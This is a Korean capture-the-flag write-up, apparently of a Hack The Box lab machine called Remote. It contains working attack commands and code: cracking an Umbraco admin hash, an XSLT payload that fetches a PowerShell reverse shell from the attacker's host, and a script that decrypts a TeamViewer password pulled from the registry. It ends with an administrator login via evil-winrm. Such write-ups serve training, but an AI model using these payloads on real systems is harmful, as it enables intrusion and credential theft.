1. Recon
1.1. nmap
nmap 정찰 결과 80포트에 어떤 서비스가 존재하니 웹 정찰을 해야 함을 알 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# nmap -sC -sV 10.129.230.172 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-05 08:52 +04
Warning: 10.129.230.172 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.129.230.172
Host is up (0.20s latency).
Not shown: 65503 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
532/tcp filtered netnews
1130/tcp filtered casp
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7695/tcp filtered unknown
8776/tcp filtered unknown
9167/tcp filtered unknown
9407/tcp filtered unknown
16418/tcp filtered unknown
22202/tcp filtered unknown
25295/tcp filtered unknown
37535/tcp filtered unknown
40227/tcp filtered unknown
43280/tcp filtered unknown
45921/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47883/tcp filtered unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
52125/tcp filtered unknown
58346/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-05T05:53:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 1h00m04s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.46 seconds
1.2. 웹 정찰
웹에 들어가봐야 특별한 사항은 발견할 수 없다.
1.3. 웹 디렉토리 리스팅
ffuf 를 이용해서 디렉토리 목록을 확인한다. 그 중에서 눈에 띄는게 install 폴더이다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# ffuf -u http://10.129.230.172/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200
/___\ /___\ /___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.230.172/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
products [Status: 200, Size: 5328, Words: 1307, Lines: 130, Duration: 212ms]
contact [Status: 200, Size: 7880, Words: 828, Lines: 125, Duration: 268ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 281ms]
# Copyright 2007 James Fisher [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 286ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 291ms]
# [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 291ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 297ms]
# [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 302ms]
# [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 302ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 448ms]
# Priority ordered case insensative list, where entries were found [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 463ms]
# on atleast 2 different hosts [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 468ms]
# directory-list-lowercase-2.3-medium.txt [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 475ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 479ms]
[Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 479ms]
# [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 557ms]
home [Status: 200, Size: 6693, Words: 1807, Lines: 188, Duration: 581ms]
product [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 1516ms]
blog [Status: 200, Size: 5001, Words: 1249, Lines: 138, Duration: 2185ms]
install [Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 408ms]
[...SNIP...]
install 폴더로 들어가면 자동으로 umbraco 라는 경로로 리다이렉션 되는데, 여기서 umbraco 라는 웹 프레임 워크를 사용하는 것을 추정할 수 있다.
1.4. searchsploit 이용 umbraco 검색 - 실패
확인 결과 meatsploit 에서 RCE 취약점이 존재하는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# searchsploit umbraco
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
하지만 결과는 실패.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# msfconsole -q
msf6 > search umbraco
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/umbraco_upload_aspx 2012-06-28 excellent No Umbraco CMS Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/umbraco_upload_aspx
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/umbraco_upload_aspx) > show options
Module options (exploit/windows/http/umbraco_upload_aspx):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /umbraco/ yes The URI path of the Umbraco login page
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.96.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1
View the full module info with the info, or info -d command.
아무런 응답이 없다.
msf6 exploit(windows/http/umbraco_upload_aspx) > set rhosts 10.129.230.172
rhosts => 10.129.230.172
msf6 exploit(windows/http/umbraco_upload_aspx) > set lhost tun0
lhost => 10.10.14.143
msf6 exploit(windows/http/umbraco_upload_aspx) > run
[*] Started reverse TCP handler on 10.10.14.143:4444
[*] Uploading 373660 bytes through /umbraco/webservices/codeEditorSave.asmx...
[*] Uploading to /umbraco/mQUXpq.aspx
[*] Didn''t get the expected 500 error code /umbraco/webservices/codeEditorSave.asmx [500 OK]. Trying to execute the payload anyway
[*] Executing /umbraco/mQUXpq.aspx...
[-] Execution failed on /umbraco/mQUXpq.aspx [404 Not Found]
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/umbraco_upload_aspx) >
1.5. showmount 이용
showmount 를 이용해서 확인 결과 공유 폴더가 site_backups 라는 거를 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# showmount -e 10.129.230.172
Export list for 10.129.230.172:
/site_backups (everyone)
해당 폴더에 접근해서 내부를 살핀다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# mount -t nfs 10.129.230.172:/site_backups /mnt/
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cd /mnt
┌──(root㉿kali)-[/mnt]
└─# ls
App_Browsers App_Data App_Plugins aspnet_client bin Config css default.aspx Global.asax Media scripts Umbraco Umbraco_Client Views Web.config
App_Data 디렉토리에 Umbraco.sdf 파일을 살펴본 결과 admin 계정에 sha1 이라는 어떤 해쉬값이 존재한다.
┌──(root㉿kali)-[/mnt/App_Data]
└─# strings Umbraco.sdf | head
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj
해당 해쉬를 hashcat 으로 복호화 해서 baconandcheese 이라는 평문 암호를 얻었다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' > hash
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# hashcat -m 100 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
[...SNIP...]
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
[...SNIP...]
아이디는 admin@htb.local 로, 비밀번호는 위에서 얻은 것으로 umbraco 경로의 웹 서비스에 접근해서 로그인 한 결과 아래와 같은 결과를 획득할 수 있었지만 해당 페이지에서는 얻을 수 있는 정보는 별로 없었다.
2. 내부망 침투
2.1. searchsploit 이용(2)
이전에 searchsploit 을 이용해서 msfconsole 을 통해 접근하려고 했다가 실패하였다. 이유는 계정 정보가 없어서 다른 취약점을 사용할 수가 없었는데, 지금은 admin 계정에 대한 정보가 존재하므로 취약점을 사용할 수 있다. 46153.py 에 대해서 살펴보면 계정 정보를 입력하면 페이로드를 보낼 때 RCE 를 할 수 있다.
우리의 경우에 string cmd = "/c ping 10.10.14.143"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); 를 통해서 나의 kali 에 핑을 보내는 테스트를 진행했다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cat 46153.py
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
[...SNIP...]
# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c ping 10.10.14.143"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';
login = "admin@htb.local";
password="baconandcheese";
host = "http://10.129.230.172";
[...SNIP...]
tcpdump 를 통해서 icmp 에 대해서 수신해본 결과 실제로 핑 테스트가 정상 작동하는 것을 확인할 수 있었고, 이를 통해서 RCE가 정상적으로 진행됨을 알 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:04:40.706589 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 1, length 40
10:04:40.706692 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 1, length 40
10:04:41.711182 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 2, length 40
10:04:41.711215 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 2, length 40
10:04:42.725302 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 3, length 40
10:04:42.725314 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 3, length 40
10:04:43.741190 IP 10.129.230.172 > 10.10.14.143: ICMP echo request, id 1, seq 4, length 40
10:04:43.741211 IP 10.10.14.143 > 10.129.230.172: ICMP echo reply, id 1, seq 4, length 40
2.2. 리버스 쉘 맺기
리버스 쉘을 맺기 위해 Nishang 의 쉘을 이용할 예정이다. cmd 변수에 대해서 아래와 같이 파워쉘 스크립트를 다운받을 명령을 전달한다.
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.14.143/shell.ps1\')";
그리고 shell.ps1 에 대해서도 수정을 해야 하는데, 파일 맨 마지막 줄에 리버스 쉘을 맺겠다는 명령어를 추가해 준다.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.143 -Port 443
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cat shell.ps1
function Invoke-PowerShellTcp
{
[...SNIP...]
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.143 -Port 443
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─#
그리고 443 번 포트로 수신하고 있으면 리버스 쉘을 맺을 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.230.172] 49705
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd C:\Users
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 7/9/2021 6:50 AM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 1/9/2024 9:48 AM Public
PS C:\Users> cd public
PS C:\Users\public> dir
Directory: C:\Users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/9/2024 9:48 AM Desktop
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
PS C:\Users\public> cd Desktop
PS C:\Users\public\Desktop> type user.txt
3. 권한 상승
3.1. 권한 확인
권한 확인을 했을 때 특별한 거를 찾지 못했다.
PS C:\Users\public\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\public\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
3.2. tasklist
현재 실행중인 프로그램들을 확인해 봤을 때 TeamViewer_Service.exe 가 눈에 띈다.
PS C:\Users\public\Desktop> tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 140 K
Registry 88 0 20,440 K
smss.exe 292 0 1,236 K
[...SNIP...]
vmtoolsd.exe 2244 0 17,800 K
MsMpEng.exe 2292 0 111,368 K
TeamViewer_Service.exe 2352 0 19,220 K
svchost.exe 2388 0 12,340 K
nfssvc.exe 2472 0 5,308 K
[...SNIP...]
3.3. TeamViewer 취약점 찾기
해당 파일의 경로로 이동해서 확인 결과 TeamViewer7 버전을 사용함을 알 수 있다. 구식의 버전이라 취약점이 존재할 것이다.
PS C:\> cd "Program Files (x86)"
PS C:\Program Files (x86)> dir
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 3:28 AM Common Files
d----- 9/15/2018 5:06 AM Internet Explorer
d----- 2/23/2020 2:19 PM Microsoft SQL Server
d----- 2/23/2020 2:15 PM Microsoft.NET
d----- 2/19/2020 3:11 PM MSBuild
d----- 2/19/2020 3:11 PM Reference Assemblies
d----- 2/20/2020 2:14 AM TeamViewer
d----- 9/15/2018 5:05 AM Windows Defender
d----- 9/15/2018 3:19 AM Windows Mail
d----- 10/29/2018 6:39 PM Windows Media Player
d----- 9/15/2018 3:19 AM Windows Multimedia Platform
d----- 9/15/2018 3:28 AM windows nt
d----- 10/29/2018 6:39 PM Windows Photo Viewer
d----- 9/15/2018 3:19 AM Windows Portable Devices
d----- 9/15/2018 3:19 AM WindowsPowerShell
PS C:\Program Files (x86)> cd TeamViewer
PS C:\Program Files (x86)\TeamViewer> dir
Directory: C:\Program Files (x86)\TeamViewer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2020 10:35 AM Version7
3.4. 레지스트리 경로에서 Password 추출
해당 프로그램에 대해서 get-itemproperty 를 확인해본 결과 PSPath 에 해당하는 부분에 HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\version7 의 경로에 레지스트리가 존재함을 알 수 있다.
PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .
StartMenuGroup : TeamViewer 7
InstallationDate : 2020-02-20
InstallationDirectory : C:\Program Files (x86)\TeamViewer\Version7
Always_Online : 1
Security_ActivateDirectIn : 0
Version : 7.0.43148
ClientIC : 301094961
PK : {191, 173, 42, 237...}
SK : {248, 35, 152, 56...}
LastMACUsed : {, 005056B07D8F}
MIDInitiativeGUID : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion : 1
ClientID : 1769137322
CUse : 1
LastUpdateCheck : 1704810710
UsageEnvironmentBackup : 1
SecurityPasswordAES : {255, 155, 28, 115...}
MultiPwdMgmtIDs : {admin}
MultiPwdMgmtPWDs : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer\vers
ion7
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer
PSChildName : version7
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
TeamViewer7 에서는 레지스트리에 비밀번호를 저장해놓고 있기 때문에 해달 레지스트리로 이동을 한다. 그리고 위에서 잠깐 앞부분만 나왔던 SecurityPasswordAES 항목에 대해 출력을 요구한다. 그러면 아래와 같은 결과가 나온다.
PS HKLM:\software\wow6432node\teamviewer\version7> (get-itemproperty -path .).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91
3.5. TeamViewer 암호 복호화
해당 암호를 복호화 하기 위해 아래와 같은 파일을 만든다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cat decrypt.py
#!/usr/bin/env python3
from Crypto.Cipher import AES
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
126, 141, 55, 107, 38, 57, 78, 91])
aes = AES.new(key, AES.MODE_CBC, IV=iv)
password = aes.decrypt(ciphertext).decode("utf-16").rstrip("\x00")
print(f"[+] Found password: {password}")
그 다음에 pip 모듈을 설치한다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# pip3 install pycryptodome --break-system-packages
Collecting pycryptodome
Downloading pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl.metadata (3.4 kB)
Downloading pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl (2.2 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.2/2.2 MB 10.5 MB/s eta 0:00:00
Installing collected packages: pycryptodome
ERROR: pip dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.
netexec 1.4.0 requires aardwolf>=0.2.8, which is not installed.
netexec 1.4.0 requires jwt>=1.3.1, which is not installed.
Successfully installed pycryptodome-3.23.0
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# python decrypt.py
[+] Found password: !R3m0te!
3.6. 관리자 flag 획득
그리고 관리자 권한까지 접근에 성공한다.
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# evil-winrm -i 10.129.230.172 -u administrator -p '!R3m0te!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt